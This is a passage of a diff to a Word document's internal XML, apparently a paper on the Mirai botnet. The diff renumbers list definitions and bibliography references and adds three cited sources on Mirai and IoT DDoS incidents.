   <w:num w:numId="18">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="19">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="20">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="20"/>
+  </w:num>
+  <w:num w:numId="21">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="22">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="23">
+    <w:abstractNumId w:val="4"/>
   </w:num>
 </w:numbering>
 </file>
@@ -14824,7 +17019,7 @@
     <b:Month>12</b:Month>
     <b:Day>25</b:Day>
     <b:URL>http://blog.nsfocus.net/germany-1127-network-events/</b:URL>
-    <b:RefOrder>10</b:RefOrder>
+    <b:RefOrder>11</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>360</b:Tag>
@@ -14856,7 +17051,7 @@
     <b:Month>10</b:Month>
     <b:Day>27</b:Day>
     <b:URL>http://blog.netlab.360.com/a-mirai-botnet-c2-data-analysis/</b:URL>
-    <b:RefOrder>9</b:RefOrder>
+    <b:RefOrder>10</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>Tak16</b:Tag>
@@ -14931,7 +17126,7 @@
     <b:Month>10</b:Month>
     <b:Day>13</b:Day>
     <b:URL>http://blog.nsfocus.net/mirai-source-analysis-report/</b:URL>
-    <b:RefOrder>11</b:RefOrder>
+    <b:RefOrder>12</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>3601</b:Tag>
@@ -14944,7 +17139,7 @@
     </b:Author>
     <b:Title>Mirai Scanner</b:Title>
     <b:URL>http://data.netlab.360.com/mirai-scanner</b:URL>
-    <b:RefOrder>8</b:RefOrder>
+    <b:RefOrder>9</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>Bad</b:Tag>
@@ -14961,7 +17156,7 @@
     </b:Author>
     <b:Title>New Mirai attack vector – bot exploits a recently discovered router vulnerability</b:Title>
     <b:URL>https://badcyber.com/new-mirai-attack-vector-bot-exploits-a-recently-discovered-router-vulnerability/</b:URL>
-    <b:RefOrder>14</b:RefOrder>
+    <b:RefOrder>17</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>Wik16</b:Tag>
@@ -14976,7 +17171,7 @@
     <b:Year>2016</b:Year>
     <b:Month>12</b:Month>
     <b:URL>https://en.wikipedia.org/wiki/Mirai_(malware)</b:URL>
-    <b:RefOrder>7</b:RefOrder>
+    <b:RefOrder>8</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>len16</b:Tag>
@@ -14996,7 +17191,7 @@
     <b:Month>11</b:Month>
     <b:Day>28</b:Day>
     <b:URL>https://blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot/</b:URL>
-    <b:RefOrder>12</b:RefOrder>
+    <b:RefOrder>15</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>Ken16</b:Tag>
@@ -15016,7 +17211,7 @@
     <b:Month>11</b:Month>
     <b:Day>7</b:Day>
     <b:URL>https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/</b:URL>
-    <b:RefOrder>13</b:RefOrder>
+    <b:RefOrder>16</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>360162</b:Tag>
@@ -15038,11 +17233,65 @@
     <b:URL>http://blog.netlab.360.com/new-mirai-variant-with-dga-chinese-version/</b:URL>
     <b:RefOrder>6</b:RefOrder>
   </b:Source>
+  <b:Source>
+    <b:Tag>泰格实17</b:Tag>
+    <b:SourceType>DocumentFromInternetSite</b:SourceType>
+    <b:Guid>{27313EDE-9E33-4C0F-A8AE-CD43C89F8ED3}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>泰格实验室</b:Last>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>蜜罐揭秘真实的Mirai僵尸网络</b:Title>
+    <b:Year>2017</b:Year>
+    <b:Month>1</b:Month>
+    <b:Day>9</b:Day>
+    <b:URL>http://www.freebuf.com/articles/terminal/124717.html</b:URL>
+    <b:RefOrder>14</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Joh</b:Tag>
+    <b:SourceType>DocumentFromInternetSite</b:SourceType>
+    <b:Guid>{4CD1B70B-FF0D-4DE1-87A4-DF9C021E2AEB}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Bambenek</b:Last>
+            <b:First>John</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>Mirai Scanning for Port 6789 Looking for New Victims / Now hitting tcp/23231</b:Title>
+    <b:URL>https://isc.sans.edu/forums/diary/UPDATED+x1+Mirai+Scanning+for+Port+6789+Looking+for+New+Victims+Now+hitting+tcp23231/21833/</b:URL>
+    <b:RefOrder>7</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>匡恩网16</b:Tag>
+    <b:SourceType>DocumentFromInternetSite</b:SourceType>
+    <b:Guid>{E781E1F5-D11D-4B6A-B953-B0DAD4831834}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>匡恩网络</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:Title>北美DDoS事件与IOT安防监控设备安全</b:Title>
+    <b:Year>2016</b:Year>
+    <b:Month>10</b:Month>
+    <b:Day>24</b:Day>
+    <b:URL>http://www.kuangn.com/news/industry/detail/458.html</b:URL>
+    <b:RefOrder>13</b:RefOrder>
+  </b:Source>
 </b:Sources>
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{11AE9D98-DE08-4494-BEE3-93F4174A1EF5}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{80E08F97-B0F1-4287-AC34-95B714283261}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
